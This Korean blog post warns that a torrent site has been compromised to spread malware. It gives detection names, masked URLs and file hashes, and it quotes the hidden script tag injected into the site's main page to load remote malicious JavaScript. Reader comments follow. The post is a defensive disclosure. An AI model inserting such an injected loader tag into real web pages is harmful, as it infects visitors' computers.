무비X지 이용하시는 분들은 자제하시기 바랍니다.
몇일전 부터 계속 해킹을 당하고 있으며, 악성코드가 심어져 있습니다.
5월 2일자
HTML:IFrame-DQ [Trj] "http://www.*****.com.tw/ytfl.htm"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/16.js"
5월3일자
HTML:Script-inf "http://www.*****.com/topmain.php"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/x.js"
x.js 파일을 살펴보시면..
아이프레임 태그로 "http://www.*****.com.tw/index.htm" 불러 옵니다.
x.js
MD5...: 913ae2e3c77546e4551e91b525269191
SHA1..: ea1441081e9885a5c7c3c9f498bdb6f674076b7b
SHA256: 6c5da550d7f4e34fa392fbb799dd5f4202dca3acc1fc79f1343b9534706eb70c
SHA512: faa052efdfffdcc39c7e8563a7bb0c21ecc4940b682cb7d768a57429db555388
b96a3cf0ba57f46c8eea535509393a43fb0e85de12b41e1d574698327dcb2a23
ssdeep: 3:yLRmcpZUOAoRRN4ZJS4STLPDm0Cjf:yL/pZbAo3Nuc4WbDFCr
PEiD..: -
TrID..: File type identification
file seems to be plain text/ASCII (0.0%)
PEInfo: -
PDFiD.: -
RDS...: NSRL Reference Data Set
아래 이미지에 붉은색 박스를 보시면 아시겠지만,
현재 메인페이지에
<script src=http://www.*****.com.tw/x.js></script>
숨겨져 있습니다.
현재 시간 오후 9시 35분 정도 됐는데..
지금은 제거 된거 같네요...
추가) Fedora님께서 자세히 분석해 놓으셨습니다.
H.exe 악성코드 분석 - http://fedorame.blogspot.com/2009/05/blog-post.html
Trackback address :: http://www.ziwoogae.com/trackback/1183
Comments List
토렌트 조심해야겠군요..
네ㅋㅋ 개편된 이후로 보안이 엄청 취약하네요.
홈페이지 관리자는 악성 코드 유포해서는 안되며,
유포지로 활용되어서는 안되죠.
네.. 그렇죠~ ^^
요즘엔 소위 클릭질 몇번 잘 못했다가.. 좀비PC가 되며 개인정보를 날려버리죠 ㅠㅠ
헐.. 아는 토렌트 사이트도 많지 않은데...
한곳은 북마크삭제를 해야겠네요~ㅠ.ㅠ
지금은 제거된거 같습니다^^
스크립트 삽입이라.. 주소를 보니 대만이군요.
예전에 X선일보도 저랬다죠..